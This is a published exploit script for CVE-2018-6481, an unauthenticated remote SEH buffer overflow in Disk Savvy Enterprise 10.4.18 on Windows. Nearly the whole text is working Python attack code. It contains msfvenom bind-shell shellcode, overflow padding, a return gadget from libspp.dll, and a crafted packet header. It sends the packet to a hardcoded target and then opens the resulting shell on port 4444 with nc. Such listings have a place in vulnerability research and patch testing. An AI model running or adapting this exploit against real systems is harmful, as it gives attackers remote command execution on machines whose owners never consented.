Disk Savvy Enterprise 10.4.18 Buffer Overflow

`# Exploit Title: Disk Savvy Enterprise v10.4.18 Server - Unauthenticated Remote Buffer Overflow SEH  
# Date: 01/02/2018  
# Exploit Author: Daniel Teixeira  
# Vendor Homepage: http://www.disksavvy.com/  
# Software Link: http://www.disksavvy.com/setups/disksavvyent_setup_v10.4.18.exe  
# Version: 10.4.18  
# CVE: CVE-2018-6481  
# Tested on: Windows 7 x86  
  
  
from struct import pack  
from os import system  
from sys import exit  
from time import sleep  
import socket  
  
port = 9124  
host = "172.16.40.148"  
  
# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp -f py -b '\x00\x02\x0a\x0d\xf8\xfd' --var-name shellcode   
shellcode = ""  
shellcode += "\xba\x71\x6d\xbf\xc8\xd9\xc0\xd9\x74\x24\xf4\x5d"  
shellcode += "\x29\xc9\xb1\x53\x83\xed\xfc\x31\x55\x0e\x03\x24"  
shellcode += "\x63\x5d\x3d\x3a\x93\x23\xbe\xc2\x64\x44\x36\x27"  
shellcode += "\x55\x44\x2c\x2c\xc6\x74\x26\x60\xeb\xff\x6a\x90"  
shellcode += "\x78\x8d\xa2\x97\xc9\x38\x95\x96\xca\x11\xe5\xb9"  
shellcode += "\x48\x68\x3a\x19\x70\xa3\x4f\x58\xb5\xde\xa2\x08"  
shellcode += "\x6e\x94\x11\xbc\x1b\xe0\xa9\x37\x57\xe4\xa9\xa4"  
shellcode += "\x20\x07\x9b\x7b\x3a\x5e\x3b\x7a\xef\xea\x72\x64"  
shellcode += "\xec\xd7\xcd\x1f\xc6\xac\xcf\xc9\x16\x4c\x63\x34"  
shellcode += "\x97\xbf\x7d\x71\x10\x20\x08\x8b\x62\xdd\x0b\x48"  
shellcode += "\x18\x39\x99\x4a\xba\xca\x39\xb6\x3a\x1e\xdf\x3d"  
shellcode += "\x30\xeb\xab\x19\x55\xea\x78\x12\x61\x67\x7f\xf4"  
shellcode += "\xe3\x33\xa4\xd0\xa8\xe0\xc5\x41\x15\x46\xf9\x91"  
shellcode += "\xf6\x37\x5f\xda\x1b\x23\xd2\x81\x73\x80\xdf\x39"  
shellcode += "\x84\x8e\x68\x4a\xb6\x11\xc3\xc4\xfa\xda\xcd\x13"  
shellcode += "\xfc\xf0\xaa\x8b\x03\xfb\xca\x82\xc7\xaf\x9a\xbc"  
shellcode += "\xee\xcf\x70\x3c\x0e\x1a\xec\x34\xa9\xf5\x13\xb9"  
shellcode += "\x09\xa6\x93\x11\xe2\xac\x1b\x4e\x12\xcf\xf1\xe7"  
shellcode += "\xbb\x32\xfa\x16\x60\xba\x1c\x72\x88\xea\xb7\xea"  
shellcode += "\x6a\xc9\x0f\x8d\x95\x3b\x38\x39\xdd\x2d\xff\x46"  
shellcode += "\xde\x7b\x57\xd0\x55\x68\x63\xc1\x69\xa5\xc3\x96"  
shellcode += "\xfe\x33\x82\xd5\x9f\x44\x8f\x8d\x3c\xd6\x54\x4d"  
shellcode += "\x4a\xcb\xc2\x1a\x1b\x3d\x1b\xce\xb1\x64\xb5\xec"  
shellcode += "\x4b\xf0\xfe\xb4\x97\xc1\x01\x35\x55\x7d\x26\x25"  
shellcode += "\xa3\x7e\x62\x11\x7b\x29\x3c\xcf\x3d\x83\x8e\xb9"  
shellcode += "\x97\x78\x59\x2d\x61\xb3\x5a\x2b\x6e\x9e\x2c\xd3"  
shellcode += "\xdf\x77\x69\xec\xd0\x1f\x7d\x95\x0c\x80\x82\x4c"  
shellcode += "\x95\xb0\xc8\xcc\xbc\x58\x95\x85\xfc\x04\x26\x70"  
shellcode += "\xc2\x30\xa5\x70\xbb\xc6\xb5\xf1\xbe\x83\x71\xea"  
shellcode += "\xb2\x9c\x17\x0c\x60\x9c\x3d"  
  
payload = "A" * 124 # offset  
payload += "\x90\x09\xeb\x05" # jmp over seh retrun value  
payload += "\x13\x6d\x05\x10" # 0x10056d13 : pop ebx # pop ecx # ret 0x20 | ascii {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Disk Savvy Enterprise\bin\libspp.dll)  
  
  
  
payload += "\x90" * 10  
payload += "\x83\xc4\x64" * 20 # metasm > add esp,100  
payload += "\xff\xe4" # metasm > jmp esp  
payload += "\x90" * (1000 - len(payload) - len(shellcode))  
payload += shellcode  
  
header = "\x75\x19\xba\xab"  
header += "\x03\x00\x00\x00"  
header += "\x00\x40\x00\x00"  
header += pack('<I', len(payload))  
header += pack('<I', len(payload))  
header += pack('<I', ord(payload[-1]))  
packet = header  
packet += payload   
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
  
try:  
  
print "[*] Testing connection to tatget %s:%s" %(host,port)  
s.connect((host, port))  
  
except:  
  
print "[-] Unable to communicate to target %s:%s" %(host,port)  
  
exit()  
  
s.send(packet)  
  
print "[*] Payload Sent.."  
print "[*] Connecting to bind shell %s:4444 .." %host  
sleep(5)  
system("nc %s 4444"%host)  
  
`